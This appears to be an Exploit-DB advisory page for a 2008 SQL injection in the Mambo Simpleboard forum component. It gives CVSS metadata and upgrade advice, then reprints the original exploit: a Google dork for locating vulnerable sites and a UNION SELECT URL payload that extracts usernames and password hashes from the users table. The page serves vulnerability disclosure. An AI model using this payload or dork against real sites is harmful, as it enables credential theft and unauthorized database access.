Mambo Simpleboard Forum Component 1.0.3 Stable (com_simpleboard)

vendor:

Mambo Simpleboard Forum Component

by:

Scipio, xcedz

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Mambo Simpleboard Forum Component

Affected Version From: 1.0.3

Affected Version To: 1.0.3

Patch Exists: Yes

Related CWE: N/A

CPE: a:mambo:mambo_simpleboard_forum_component:1.0.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Mambo Simpleboard Forum Component 1.0.3 Stable (com_simpleboard)

A SQL injection vulnerability exists in Mambo Simpleboard Forum Component 1.0.3 Stable (com_simpleboard). An attacker can send a specially crafted HTTP request to the vulnerable application to execute arbitrary SQL commands in the back-end database, allowing the attacker to bypass authentication and gain access to unauthorized data.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to upgrade to the latest version.

Source

Exploit-DB raw data:

#########################################################
##
##  Mambo Simpleboard Forum Component 1.0.3 Stable (com_simpleboard)
##
##
##  Author: it's my, Scipio, xcedz
##
##  Home page: http://www.antichat.ru
##
#########################################################
##
## Dork: inurl:"index.php?option=com_simpleboard"
##
#########################################################
   
   Exploit:

http://site.com/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*

#########################################################
## Together, we have strength =) ####    www.antichat.ru
#########################################################

# milw0rm.com [2008-02-27]